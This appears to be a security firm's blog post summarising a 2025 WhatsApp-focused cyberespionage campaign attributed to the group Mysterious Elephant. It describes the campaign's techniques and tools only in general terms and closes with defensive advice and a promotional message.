WhatsApp cyberespionage: Silent data theft
- Cyberpeace Tech
- Jan 13
- 3 min read
In early 2025, a new WhatsApp cyberespionage operation was detected, attributed to the advanced persistent threat group known as Mysterious Elephant. This campaign has mainly targeted government institutions and organizations linked to foreign relations in Asia-Pacific countries, where the main objective is to steal confidential information stored and shared through WhatsApp.
Although the attacks are concentrated in regions such as Pakistan, Bangladesh, and Sri Lanka, this type of threat serves as a clear example of the risks also faced by public agencies, strategic companies, and diplomatic organizations in Mexico, especially those that use messaging applications as part of their daily communication.
New techniques for more sophisticated espionage
During this campaign, the attackers significantly modified their modus operandi. They now combine custom developed tools with open source software to infiltrate more discreetly.
Initial access is usually gained through emails targeted specifically at each victim, malicious documents, and the use of technical vulnerabilities that allow code to be executed without raising suspicion.
Once inside the systems, attackers seek to elevate privileges, analyze the internal infrastructure, and extract sensitive files such as official documents, images, and compressed files.
PowerShell and covert remote control
One of the key elements of this operation is the intensive use of PowerShell scripts. These sequences allow malicious instructions to be executed, new payloads of harmful software to be installed, and unauthorized access to be maintained for long periods of time. By relying on legitimate system tools, attackers are able to hide their actions and reduce the chances of detection.
Among the tools identified is BabShell, a mechanism that grants remote control over compromised computers.
This resource allows technical information about the system to be collected, such as the active user, the computer name, and network data, which facilitates the individual tracking of each infected device. It also serves as a starting point for executing more advanced modules that operate directly in memory to evade security controls.
WhatsApp as the main target
A particularly worrying aspect of this WhatsApp cyberespionage campaign is its direct focus on extracting files shared through the application. The attackers developed specific components capable of obtaining documents, photographs, and compressed files exchanged in conversations, which represents a critical risk for organizations that handle sensitive information through messaging platforms.
In the Mexican context, where WhatsApp is one of the most widely used communication tools for both personal and professional purposes, this type of attack reinforces the need to adopt stricter security measures and clear policies on the use of messaging applications in work environments.
Infrastructure designed for stealth
The infrastructure used by this group is characterized by its high concealment capacity. It employs multiple domains, IP addresses, dynamic DNS records, and cloud services that make it difficult to track. This architecture allows operations to be scaled quickly and maintained persistently without being easily detected.
According to specialists from Kaspersky's research team, understanding the tactics of these groups, sharing threat intelligence, and strengthening security measures are key to reducing the impact of successful attacks.
Constantly updating systems, monitoring networks, and training staff are essential actions for protecting critical information.
At Cyberpeace, we believe that information is key to anticipating digital threats. Staying up to date on cybersecurity allows you to make better decisions and reduce risks. Prevention begins with knowledge.
Want to learn more about how to protect your information and strengthen your digital security? Follow us on our social media channels and stay up to date.
Comments